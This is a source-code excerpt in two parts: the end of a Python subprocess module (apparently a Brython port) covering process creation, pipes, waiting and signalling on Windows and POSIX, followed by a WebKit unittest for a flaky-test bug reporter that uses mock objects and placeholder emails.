stdout is not None or stderr is not None) if close_fds is _PLATFORM_DEFAULT_CLOSE_FDS: if any_stdio_set: close_fds = False else: close_fds = True elif close_fds and any_stdio_set: raise ValueError( "close_fds is not supported on Windows platforms" " if you redirect stdin/stdout/stderr") else: # POSIX if close_fds is _PLATFORM_DEFAULT_CLOSE_FDS: close_fds = True if pass_fds and not close_fds: warnings.warn("pass_fds overriding close_fds.", RuntimeWarning) close_fds = True if startupinfo is not None: raise ValueError("startupinfo is only supported on Windows " "platforms") if creationflags != 0: raise ValueError("creationflags is only supported on Windows " "platforms") self.args = args self.stdin = None self.stdout = None self.stderr = None self.pid = None self.returncode = None self.universal_newlines = universal_newlines # Input and output objects. The general principle is like # this: # # Parent Child # ------ ----- # p2cwrite ---stdin---> p2cread # c2pread <--stdout--- c2pwrite # errread <--stderr--- errwrite # # On POSIX, the child objects are file descriptors. On # Windows, these are Windows file handles. The parent objects # are file descriptors on both platforms. The parent objects # are -1 when not using PIPEs. The child objects are -1 # when not redirecting. (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) = self._get_handles(stdin, stdout, stderr) # We wrap OS handles *before* launching the child, otherwise a # quickly terminating child could make our fds unwrappable # (see #8458). #fix me brython syntax error #if mswindows: # if p2cwrite != -1: # p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0) # if c2pread != -1: # c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0) # if errread != -1: # errread = msvcrt.open_osfhandle(errread.Detach(), 0) if p2cwrite != -1: self.stdin = io.open(p2cwrite, 'wb', bufsize) if universal_newlines: self.stdin = io.TextIOWrapper(self.stdin, write_through=True) if c2pread != -1: self.stdout = io.open(c2pread, 'rb', bufsize) if universal_newlines: self.stdout = io.TextIOWrapper(self.stdout) if errread != -1: self.stderr = io.open(errread, 'rb', bufsize) if universal_newlines: self.stderr = io.TextIOWrapper(self.stderr) self._closed_child_pipe_fds = False try: self._execute_child(args, executable, preexec_fn, close_fds, pass_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session) except: # Cleanup if the child failed starting. for f in filter(None, (self.stdin, self.stdout, self.stderr)): try: f.close() except EnvironmentError: pass # Ignore EBADF or other errors. if not self._closed_child_pipe_fds: to_close = [] if stdin == PIPE: to_close.append(p2cread) if stdout == PIPE: to_close.append(c2pwrite) if stderr == PIPE: to_close.append(errwrite) if hasattr(self, '_devnull'): to_close.append(self._devnull) for fd in to_close: try: os.close(fd) except EnvironmentError: pass raise def _translate_newlines(self, data, encoding): data = data.decode(encoding) return data.replace("\r\n", "\n").replace("\r", "\n") def __enter__(self): return self def __exit__(self, type, value, traceback): if self.stdout: self.stdout.close() if self.stderr: self.stderr.close() if self.stdin: self.stdin.close() # Wait for the process to terminate, to avoid zombies. self.wait() def __del__(self, _maxsize=sys.maxsize, _active=_active): # If __init__ hasn't had a chance to execute (e.g. if it # was passed an undeclared keyword argument), we don't # have a _child_created attribute at all. if not getattr(self, '_child_created', False): # We didn't get to successfully create a child process. return # In case the child hasn't been waited on, check if it's done. self._internal_poll(_deadstate=_maxsize) if self.returncode is None and _active is not None: # Child is still running, keep us alive until we can wait on it. _active.append(self) def _get_devnull(self): if not hasattr(self, '_devnull'): self._devnull = os.open(os.devnull, os.O_RDWR) return self._devnull def communicate(self, input=None, timeout=None): """Interact with process: Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate. The optional input argument should be bytes to be sent to the child process, or None, if no data should be sent to the child. communicate() returns a tuple (stdout, stderr).""" if self._communication_started and input: raise ValueError("Cannot send input after starting communication") # Optimization: If we are not worried about timeouts, we haven't # started communicating, and we have one or zero pipes, using select() # or threads is unnecessary. if (timeout is None and not self._communication_started and [self.stdin, self.stdout, self.stderr].count(None) >= 2): stdout = None stderr = None if self.stdin: if input: try: self.stdin.write(input) except IOError as e: if e.errno != errno.EPIPE and e.errno != errno.EINVAL: raise self.stdin.close() elif self.stdout: stdout = _eintr_retry_call(self.stdout.read) self.stdout.close() elif self.stderr: stderr = _eintr_retry_call(self.stderr.read) self.stderr.close() self.wait() else: if timeout is not None: endtime = _time() + timeout else: endtime = None try: stdout, stderr = self._communicate(input, endtime, timeout) finally: self._communication_started = True sts = self.wait(timeout=self._remaining_time(endtime)) return (stdout, stderr) def poll(self): return self._internal_poll() def _remaining_time(self, endtime): """Convenience for _communicate when computing timeouts.""" if endtime is None: return None else: return endtime - _time() def _check_timeout(self, endtime, orig_timeout): """Convenience for checking if a timeout has expired.""" if endtime is None: return if _time() > endtime: raise TimeoutExpired(self.args, orig_timeout) if mswindows: # # Windows methods # def _get_handles(self, stdin, stdout, stderr): """Construct and return tuple with IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ if stdin is None and stdout is None and stderr is None: return (-1, -1, -1, -1, -1, -1) p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 if stdin is None: p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE) if p2cread is None: p2cread, _ = _winapi.CreatePipe(None, 0) p2cread = Handle(p2cread) _winapi.CloseHandle(_) elif stdin == PIPE: p2cread, p2cwrite = _winapi.CreatePipe(None, 0) p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite) elif stdin == DEVNULL: p2cread = msvcrt.get_osfhandle(self._get_devnull()) elif isinstance(stdin, int): p2cread = msvcrt.get_osfhandle(stdin) else: # Assuming file-like object p2cread = msvcrt.get_osfhandle(stdin.fileno()) p2cread = self._make_inheritable(p2cread) if stdout is None: c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE) if c2pwrite is None: _, c2pwrite = _winapi.CreatePipe(None, 0) c2pwrite = Handle(c2pwrite) _winapi.CloseHandle(_) elif stdout == PIPE: c2pread, c2pwrite = _winapi.CreatePipe(None, 0) c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite) elif stdout == DEVNULL: c2pwrite = msvcrt.get_osfhandle(self._get_devnull()) elif isinstance(stdout, int): c2pwrite = msvcrt.get_osfhandle(stdout) else: # Assuming file-like object c2pwrite = msvcrt.get_osfhandle(stdout.fileno()) c2pwrite = self._make_inheritable(c2pwrite) if stderr is None: errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE) if errwrite is None: _, errwrite = _winapi.CreatePipe(None, 0) errwrite = Handle(errwrite) _winapi.CloseHandle(_) elif stderr == PIPE: errread, errwrite = _winapi.CreatePipe(None, 0) errread, errwrite = Handle(errread), Handle(errwrite) elif stderr == STDOUT: errwrite = c2pwrite elif stderr == DEVNULL: errwrite = msvcrt.get_osfhandle(self._get_devnull()) elif isinstance(stderr, int): errwrite = msvcrt.get_osfhandle(stderr) else: # Assuming file-like object errwrite = msvcrt.get_osfhandle(stderr.fileno()) errwrite = self._make_inheritable(errwrite) return (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _make_inheritable(self, handle): """Return a duplicate of handle, which is inheritable""" h = _winapi.DuplicateHandle( _winapi.GetCurrentProcess(), handle, _winapi.GetCurrentProcess(), 0, 1, _winapi.DUPLICATE_SAME_ACCESS) return Handle(h) def _find_w9xpopen(self): """Find and return absolut path to w9xpopen.exe""" w9xpopen = os.path.join( os.path.dirname(_winapi.GetModuleFileName(0)), "w9xpopen.exe") if not os.path.exists(w9xpopen): # Eeek - file-not-found - possibly an embedding # situation - see if we can locate it in sys.exec_prefix w9xpopen = os.path.join(os.path.dirname(sys.base_exec_prefix), "w9xpopen.exe") if not os.path.exists(w9xpopen): raise RuntimeError("Cannot locate w9xpopen.exe, which is " "needed for Popen to work with your " "shell or platform.") return w9xpopen def _execute_child(self, args, executable, preexec_fn, close_fds, pass_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, unused_restore_signals, unused_start_new_session): """Execute program (MS Windows version)""" assert not pass_fds, "pass_fds not supported on Windows." if not isinstance(args, str): args = list2cmdline(args) # Process startup details if startupinfo is None: startupinfo = STARTUPINFO() if -1 not in (p2cread, c2pwrite, errwrite): startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES startupinfo.hStdInput = p2cread startupinfo.hStdOutput = c2pwrite startupinfo.hStdError = errwrite if shell: startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW startupinfo.wShowWindow = _winapi.SW_HIDE comspec = os.environ.get("COMSPEC", "cmd.exe") args = '{} /c "{}"'.format (comspec, args) if (_winapi.GetVersion() >= 0x80000000 or os.path.basename(comspec).lower() == "command.com"): # Win9x, or using command.com on NT. We need to # use the w9xpopen intermediate program. For more # information, see KB Q150956 # (http://web.archive.org/web/20011105084002/http://support.microsoft.com/support/kb/articles/Q150/9/56.asp) w9xpopen = self._find_w9xpopen() args = '"%s" %s' % (w9xpopen, args) # Not passing CREATE_NEW_CONSOLE has been known to # cause random failures on win9x. Specifically a # dialog: "Your program accessed mem currently in # use at xxx" and a hopeful warning about the # stability of your system. Cost is Ctrl+C won't # kill children. creationflags |= _winapi.CREATE_NEW_CONSOLE # Start the process try: hp, ht, pid, tid = _winapi.CreateProcess(executable, args, # no special security None, None, int(not close_fds), creationflags, env, cwd, startupinfo) except pywintypes.error as e: # Translate pywintypes.error to WindowsError, which is # a subclass of OSError. FIXME: We should really # translate errno using _sys_errlist (or similar), but # how can this be done from Python? raise WindowsError(*e.args) finally: # Child is launched. Close the parent's copy of those pipe # handles that only the child should have open. You need # to make sure that no handles to the write end of the # output pipe are maintained in this process or else the # pipe will not close when the child process exits and the # ReadFile will hang. if p2cread != -1: p2cread.Close() if c2pwrite != -1: c2pwrite.Close() if errwrite != -1: errwrite.Close() if hasattr(self, '_devnull'): os.close(self._devnull) # Retain the process handle, but close the thread handle self._child_created = True self._handle = Handle(hp) self.pid = pid _winapi.CloseHandle(ht) def _internal_poll(self, _deadstate=None, _WaitForSingleObject=_winapi.WaitForSingleObject, _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0, _GetExitCodeProcess=_winapi.GetExitCodeProcess): """Check if child process has terminated. Returns returncode attribute. This method is called by __del__, so it can only refer to objects in its local scope. """ if self.returncode is None: if _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0: self.returncode = _GetExitCodeProcess(self._handle) return self.returncode def wait(self, timeout=None, endtime=None): """Wait for child process to terminate. Returns returncode attribute.""" if endtime is not None: timeout = self._remaining_time(endtime) if timeout is None: timeout_millis = _winapi.INFINITE else: timeout_millis = int(timeout * 1000) if self.returncode is None: result = _winapi.WaitForSingleObject(self._handle, timeout_millis) if result == _winapi.WAIT_TIMEOUT: raise TimeoutExpired(self.args, timeout) self.returncode = _winapi.GetExitCodeProcess(self._handle) return self.returncode def _readerthread(self, fh, buffer): buffer.append(fh.read()) fh.close() def _communicate(self, input, endtime, orig_timeout): # Start reader threads feeding into a list hanging off of this # object, unless they've already been started. if self.stdout and not hasattr(self, "_stdout_buff"): self._stdout_buff = [] self.stdout_thread = \ threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff)) self.stdout_thread.daemon = True self.stdout_thread.start() if self.stderr and not hasattr(self, "_stderr_buff"): self._stderr_buff = [] self.stderr_thread = \ threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff)) self.stderr_thread.daemon = True self.stderr_thread.start() if self.stdin: if input is not None: try: self.stdin.write(input) except IOError as e: if e.errno != errno.EPIPE: raise self.stdin.close() # Wait for the reader threads, or time out. If we time out, the # threads remain reading and the fds left open in case the user # calls communicate again. if self.stdout is not None: self.stdout_thread.join(self._remaining_time(endtime)) if self.stdout_thread.is_alive(): raise TimeoutExpired(self.args, orig_timeout) if self.stderr is not None: self.stderr_thread.join(self._remaining_time(endtime)) if self.stderr_thread.is_alive(): raise TimeoutExpired(self.args, orig_timeout) # Collect the output from and close both pipes, now that we know # both have been read successfully. stdout = None stderr = None if self.stdout: stdout = self._stdout_buff self.stdout.close() if self.stderr: stderr = self._stderr_buff self.stderr.close() # All data exchanged. Translate lists into strings. if stdout is not None: stdout = stdout[0] if stderr is not None: stderr = stderr[0] return (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ if sig == signal.SIGTERM: self.terminate() elif sig == signal.CTRL_C_EVENT: os.kill(self.pid, signal.CTRL_C_EVENT) elif sig == signal.CTRL_BREAK_EVENT: os.kill(self.pid, signal.CTRL_BREAK_EVENT) else: raise ValueError("Unsupported signal: {}".format(sig)) def terminate(self): """Terminates the process """ try: _winapi.TerminateProcess(self._handle, 1) except PermissionError: # ERROR_ACCESS_DENIED (winerror 5) is received when the # process already died. rc = _winapi.GetExitCodeProcess(self._handle) if rc == _winapi.STILL_ACTIVE: raise self.returncode = rc kill = terminate else: # # POSIX methods # def _get_handles(self, stdin, stdout, stderr): """Construct and return tuple with IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 if stdin is None: pass elif stdin == PIPE: p2cread, p2cwrite = _create_pipe() elif stdin == DEVNULL: p2cread = self._get_devnull() elif isinstance(stdin, int): p2cread = stdin else: # Assuming file-like object p2cread = stdin.fileno() if stdout is None: pass elif stdout == PIPE: c2pread, c2pwrite = _create_pipe() elif stdout == DEVNULL: c2pwrite = self._get_devnull() elif isinstance(stdout, int): c2pwrite = stdout else: # Assuming file-like object c2pwrite = stdout.fileno() if stderr is None: pass elif stderr == PIPE: errread, errwrite = _create_pipe() elif stderr == STDOUT: errwrite = c2pwrite elif stderr == DEVNULL: errwrite = self._get_devnull() elif isinstance(stderr, int): errwrite = stderr else: # Assuming file-like object errwrite = stderr.fileno() return (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _close_fds(self, fds_to_keep): start_fd = 3 for fd in sorted(fds_to_keep): if fd >= start_fd: os.closerange(start_fd, fd) start_fd = fd + 1 if start_fd <= MAXFD: os.closerange(start_fd, MAXFD) def _execute_child(self, args, executable, preexec_fn, close_fds, pass_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session): """Execute program (POSIX version)""" if isinstance(args, (str, bytes)): args = [args] else: args = list(args) if shell: args = ["/bin/sh", "-c"] + args if executable: args[0] = executable if executable is None: executable = args[0] orig_executable = executable # For transferring possible exec failure from child to parent. # Data format: "exception name:hex errno:description" # Pickle is not used; it is complex and involves memory allocation. errpipe_read, errpipe_write = _create_pipe() try: try: # We must avoid complex work that could involve # malloc or free in the child process to avoid # potential deadlocks, thus we do all this here. # and pass it to fork_exec() if env is not None: env_list = [os.fsencode(k) + b'=' + os.fsencode(v) for k, v in env.items()] else: env_list = None # Use execv instead of execve. executable = os.fsencode(executable) if os.path.dirname(executable): executable_list = (executable,) else: # This matches the behavior of os._execvpe(). executable_list = tuple( os.path.join(os.fsencode(dir), executable) for dir in os.get_exec_path(env)) fds_to_keep = set(pass_fds) fds_to_keep.add(errpipe_write) self.pid = _posixsubprocess.fork_exec( args, executable_list, close_fds, sorted(fds_to_keep), cwd, env_list, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, errpipe_read, errpipe_write, restore_signals, start_new_session, preexec_fn) self._child_created = True finally: # be sure the FD is closed no matter what os.close(errpipe_write) # self._devnull is not always defined. devnull_fd = getattr(self, '_devnull', None) if p2cread != -1 and p2cwrite != -1 and p2cread != devnull_fd: os.close(p2cread) if c2pwrite != -1 and c2pread != -1 and c2pwrite != devnull_fd: os.close(c2pwrite) if errwrite != -1 and errread != -1 and errwrite != devnull_fd: os.close(errwrite) if devnull_fd is not None: os.close(devnull_fd) # Prevent a double close of these fds from __init__ on error. self._closed_child_pipe_fds = True # Wait for exec to fail or succeed; possibly raising an # exception (limited in size) errpipe_data = bytearray() while True: part = _eintr_retry_call(os.read, errpipe_read, 50000) errpipe_data += part if not part or len(errpipe_data) > 50000: break finally: # be sure the FD is closed no matter what os.close(errpipe_read) if errpipe_data: try: _eintr_retry_call(os.waitpid, self.pid, 0) except OSError as e: if e.errno != errno.ECHILD: raise try: exception_name, hex_errno, err_msg = ( errpipe_data.split(b':', 2)) except ValueError: exception_name = b'RuntimeError' hex_errno = b'0' err_msg = (b'Bad exception data from child: ' + repr(errpipe_data)) child_exception_type = getattr( builtins, exception_name.decode('ascii'), RuntimeError) err_msg = err_msg.decode(errors="surrogatepass") if issubclass(child_exception_type, OSError) and hex_errno: errno_num = int(hex_errno, 16) child_exec_never_called = (err_msg == "noexec") if child_exec_never_called: err_msg = "" if errno_num != 0: err_msg = os.strerror(errno_num) if errno_num == errno.ENOENT: if child_exec_never_called: # The error must be from chdir(cwd). err_msg += ': ' + repr(cwd) else: err_msg += ': ' + repr(orig_executable) raise child_exception_type(errno_num, err_msg) raise child_exception_type(err_msg) def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED, _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED, _WEXITSTATUS=os.WEXITSTATUS): # This method is called (indirectly) by __del__, so it cannot # refer to anything outside of its local scope.""" if _WIFSIGNALED(sts): self.returncode = -_WTERMSIG(sts) elif _WIFEXITED(sts): self.returncode = _WEXITSTATUS(sts) else: # Should never happen raise RuntimeError("Unknown child exit status!") def _internal_poll(self, _deadstate=None, _waitpid=os.waitpid, _WNOHANG=os.WNOHANG, _os_error=os.error, _ECHILD=errno.ECHILD): """Check if child process has terminated. Returns returncode attribute. This method is called by __del__, so it cannot reference anything outside of the local scope (nor can any methods it calls). """ if self.returncode is None: try: pid, sts = _waitpid(self.pid, _WNOHANG) if pid == self.pid: self._handle_exitstatus(sts) except _os_error as e: if _deadstate is not None: self.returncode = _deadstate elif e.errno == _ECHILD: # This happens if SIGCLD is set to be ignored or # waiting for child processes has otherwise been # disabled for our process. This child is dead, we # can't get the status. # http://bugs.python.org/issue15756 self.returncode = 0 return self.returncode def _try_wait(self, wait_flags): try: (pid, sts) = _eintr_retry_call(os.waitpid, self.pid, wait_flags) except OSError as e: if e.errno != errno.ECHILD: raise # This happens if SIGCLD is set to be ignored or waiting # for child processes has otherwise been disabled for our # process. This child is dead, we can't get the status. pid = self.pid sts = 0 return (pid, sts) def wait(self, timeout=None, endtime=None): """Wait for child process to terminate. Returns returncode attribute.""" if self.returncode is not None: return self.returncode # endtime is preferred to timeout. timeout is only used for # printing. if endtime is not None or timeout is not None: if endtime is None: endtime = _time() + timeout elif timeout is None: timeout = self._remaining_time(endtime) if endtime is not None: # Enter a busy loop if we have a timeout. This busy loop was # cribbed from Lib/threading.py in Thread.wait() at r71065. delay = 0.0005 # 500 us -> initial delay of 1 ms while True: (pid, sts) = self._try_wait(os.WNOHANG) assert pid == self.pid or pid == 0 if pid == self.pid: self._handle_exitstatus(sts) break remaining = self._remaining_time(endtime) if remaining <= 0: raise TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) else: while self.returncode is None: (pid, sts) = self._try_wait(0) # Check the pid and loop as waitpid has been known to return # 0 even without WNOHANG in odd situations. issue14396. if pid == self.pid: self._handle_exitstatus(sts) return self.returncode def _communicate(self, input, endtime, orig_timeout): if self.stdin and not self._communication_started: # Flush stdio buffer. This might block, if the user has # been writing to .stdin in an uncontrolled fashion. self.stdin.flush() if not input: self.stdin.close() if _has_poll: stdout, stderr = self._communicate_with_poll(input, endtime, orig_timeout) else: stdout, stderr = self._communicate_with_select(input, endtime, orig_timeout) self.wait(timeout=self._remaining_time(endtime)) # All data exchanged. Translate lists into strings. if stdout is not None: stdout = b''.join(stdout) if stderr is not None: stderr = b''.join(stderr) # Translate newlines, if requested. # This also turns bytes into strings. if self.universal_newlines: if stdout is not None: stdout = self._translate_newlines(stdout, self.stdout.encoding) if stderr is not None: stderr = self._translate_newlines(stderr, self.stderr.encoding) return (stdout, stderr) def _save_input(self, input): # This method is called from the _communicate_with_*() methods # so that if we time out while communicating, we can continue # sending input if we retry. if self.stdin and self._input is None: self._input_offset = 0 self._input = input if self.universal_newlines and input is not None: self._input = self._input.encode(self.stdin.encoding) def _communicate_with_poll(self, input, endtime, orig_timeout): stdout = None # Return stderr = None # Return if not self._communication_started: self._fd2file = {} poller = select.poll() def register_and_append(file_obj, eventmask): poller.register(file_obj.fileno(), eventmask) self._fd2file[file_obj.fileno()] = file_obj def close_unregister_and_remove(fd): poller.unregister(fd) self._fd2file[fd].close() self._fd2file.pop(fd) if self.stdin and input: register_and_append(self.stdin, select.POLLOUT) # Only create this mapping if we haven't already. if not self._communication_started: self._fd2output = {} if self.stdout: self._fd2output[self.stdout.fileno()] = [] if self.stderr: self._fd2output[self.stderr.fileno()] = [] select_POLLIN_POLLPRI = select.POLLIN | select.POLLPRI if self.stdout: register_and_append(self.stdout, select_POLLIN_POLLPRI) stdout = self._fd2output[self.stdout.fileno()] if self.stderr: register_and_append(self.stderr, select_POLLIN_POLLPRI) stderr = self._fd2output[self.stderr.fileno()] self._save_input(input) while self._fd2file: timeout = self._remaining_time(endtime) if timeout is not None and timeout < 0: raise TimeoutExpired(self.args, orig_timeout) try: ready = poller.poll(timeout) except select.error as e: if e.args[0] == errno.EINTR: continue raise self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the # file objects; they are no longer using C stdio! for fd, mode in ready: if mode & select.POLLOUT: chunk = self._input[self._input_offset : self._input_offset + _PIPE_BUF] try: self._input_offset += os.write(fd, chunk) except OSError as e: if e.errno == errno.EPIPE: close_unregister_and_remove(fd) else: raise else: if self._input_offset >= len(self._input): close_unregister_and_remove(fd) elif mode & select_POLLIN_POLLPRI: data = os.read(fd, 4096) if not data: close_unregister_and_remove(fd) self._fd2output[fd].append(data) else: # Ignore hang up or errors. close_unregister_and_remove(fd) return (stdout, stderr) def _communicate_with_select(self, input, endtime, orig_timeout): if not self._communication_started: self._read_set = [] self._write_set = [] if self.stdin and input: self._write_set.append(self.stdin) if self.stdout: self._read_set.append(self.stdout) if self.stderr: self._read_set.append(self.stderr) self._save_input(input) stdout = None # Return stderr = None # Return if self.stdout: if not self._communication_started: self._stdout_buff = [] stdout = self._stdout_buff if self.stderr: if not self._communication_started: self._stderr_buff = [] stderr = self._stderr_buff while self._read_set or self._write_set: timeout = self._remaining_time(endtime) if timeout is not None and timeout < 0: raise TimeoutExpired(self.args, orig_timeout) try: (rlist, wlist, xlist) = \ select.select(self._read_set, self._write_set, [], timeout) except select.error as e: if e.args[0] == errno.EINTR: continue raise # According to the docs, returning three empty lists indicates # that the timeout expired. if not (rlist or wlist or xlist): raise TimeoutExpired(self.args, orig_timeout) # We also check what time it is ourselves for good measure. self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the # file objects; they are no longer using C stdio! if self.stdin in wlist: chunk = self._input[self._input_offset : self._input_offset + _PIPE_BUF] try: bytes_written = os.write(self.stdin.fileno(), chunk) except OSError as e: if e.errno == errno.EPIPE: self.stdin.close() self._write_set.remove(self.stdin) else: raise else: self._input_offset += bytes_written if self._input_offset >= len(self._input): self.stdin.close() self._write_set.remove(self.stdin) if self.stdout in rlist: data = os.read(self.stdout.fileno(), 1024) if not data: self.stdout.close() self._read_set.remove(self.stdout) stdout.append(data) if self.stderr in rlist: data = os.read(self.stderr.fileno(), 1024) if not data: self.stderr.close() self._read_set.remove(self.stderr) stderr.append(data) return (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process with SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process with SIGKILL """ self.send_signal(signal.SIGKILL)
gpl-3.0
rishilification/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/bot/flakytestreporter_unittest.py
121
7698
# Copyright (c) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import unittest2 as unittest from webkitpy.common.config.committers import Committer from webkitpy.common.system.filesystem_mock import MockFileSystem from webkitpy.common.system.outputcapture import OutputCapture from webkitpy.layout_tests.models import test_results from webkitpy.layout_tests.models import test_failures from webkitpy.thirdparty.mock import Mock from webkitpy.tool.bot.flakytestreporter import FlakyTestReporter from webkitpy.tool.mocktool import MockTool from webkitpy.common.net.statusserver_mock import MockStatusServer # Creating fake CommitInfos is a pain, so we use a mock one here. class MockCommitInfo(object): def __init__(self, author_email): self._author_email = author_email def author(self): # It's definitely possible to have commits with authors who # are not in our contributors.json list. if not self._author_email: return None return Committer("Mock Committer", self._author_email) class FlakyTestReporterTest(unittest.TestCase): def _mock_test_result(self, testname): return test_results.TestResult(testname, [test_failures.FailureTextMismatch()]) def _assert_emails_for_test(self, emails): tool = MockTool() reporter = FlakyTestReporter(tool, 'dummy-queue') commit_infos = [MockCommitInfo(email) for email in emails] tool.checkout().recent_commit_infos_for_files = lambda paths: set(commit_infos) self.assertEqual(reporter._author_emails_for_test([]), set(emails)) def test_author_emails_for_test(self): self._assert_emails_for_test([]) self._assert_emails_for_test(["test1@test.com", "test1@test.com"]) self._assert_emails_for_test(["test1@test.com", "test2@test.com"]) def test_create_bug_for_flaky_test(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') expected_logs = """MOCK create_bug bug_title: Flaky Test: foo/bar.html bug_description: This is an automatically generated bug from the dummy-queue. foo/bar.html has been flaky on the dummy-queue. foo/bar.html was authored by test@test.com. http://trac.webkit.org/browser/trunk/LayoutTests/foo/bar.html FLAKE_MESSAGE The bots will update this with information from each new failure. If you believe this bug to be fixed or invalid, feel free to close. The bots will re-open if the flake re-occurs. If you would like to track this test fix with another bug, please close this bug as a duplicate. The bots will follow the duplicate chain when making future comments. component: Tools / Tests cc: test@test.com blocked: 50856 """ OutputCapture().assert_outputs(self, reporter._create_bug_for_flaky_test, ['foo/bar.html', ['test@test.com'], 'FLAKE_MESSAGE'], expected_logs=expected_logs) def test_follow_duplicate_chain(self): tool = MockTool() reporter = FlakyTestReporter(tool, 'dummy-queue') bug = tool.bugs.fetch_bug(50004) self.assertEqual(reporter._follow_duplicate_chain(bug).id(), 50002) def test_report_flaky_tests_creating_bug(self): tool = MockTool() tool.filesystem = MockFileSystem({"/mock-results/foo/bar-diffs.txt": "mock"}) tool.status_server = MockStatusServer(bot_id="mock-bot-id") reporter = FlakyTestReporter(tool, 'dummy-queue') reporter._lookup_bug_for_flaky_test = lambda bug_id: None patch = tool.bugs.fetch_attachment(10000) expected_logs = """Bug does not already exist for foo/bar.html, creating. MOCK create_bug bug_title: Flaky Test: foo/bar.html bug_description: This is an automatically generated bug from the dummy-queue. foo/bar.html has been flaky on the dummy-queue. foo/bar.html was authored by abarth@webkit.org. http://trac.webkit.org/browser/trunk/LayoutTests/foo/bar.html The dummy-queue just saw foo/bar.html flake (text diff) while processing attachment 10000 on bug 50000. Bot: mock-bot-id Port: MockPort Platform: MockPlatform 1.0 The bots will update this with information from each new failure. If you believe this bug to be fixed or invalid, feel free to close. The bots will re-open if the flake re-occurs. If you would like to track this test fix with another bug, please close this bug as a duplicate. The bots will follow the duplicate chain when making future comments. component: Tools / Tests cc: abarth@webkit.org blocked: 50856 MOCK add_attachment_to_bug: bug_id=60001, description=Failure diff from mock-bot-id filename=failure.diff mimetype=None MOCK bug comment: bug_id=50000, cc=None --- Begin comment --- The dummy-queue encountered the following flaky tests while processing attachment 10000: foo/bar.html bug 60001 (author: abarth@webkit.org) The dummy-queue is continuing to process your patch. --- End comment --- """ test_results = [self._mock_test_result('foo/bar.html')] class MockZipFile(object): def read(self, path): return "" def namelist(self): return ['foo/bar-diffs.txt'] OutputCapture().assert_outputs(self, reporter.report_flaky_tests, [patch, test_results, MockZipFile()], expected_logs=expected_logs) def test_optional_author_string(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') self.assertEqual(reporter._optional_author_string([]), "") self.assertEqual(reporter._optional_author_string(["foo@bar.com"]), " (author: foo@bar.com)") self.assertEqual(reporter._optional_author_string(["a@b.com", "b@b.com"]), " (authors: a@b.com and b@b.com)") def test_results_diff_path_for_test(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') self.assertEqual(reporter._results_diff_path_for_test("test.html"), "test-diffs.txt") def test_find_in_archive(self): reporter = FlakyTestReporter(MockTool(), 'dummy-queue') class MockZipFile(object): def namelist(self): return ["tmp/layout-test-results/foo/bar-diffs.txt"] 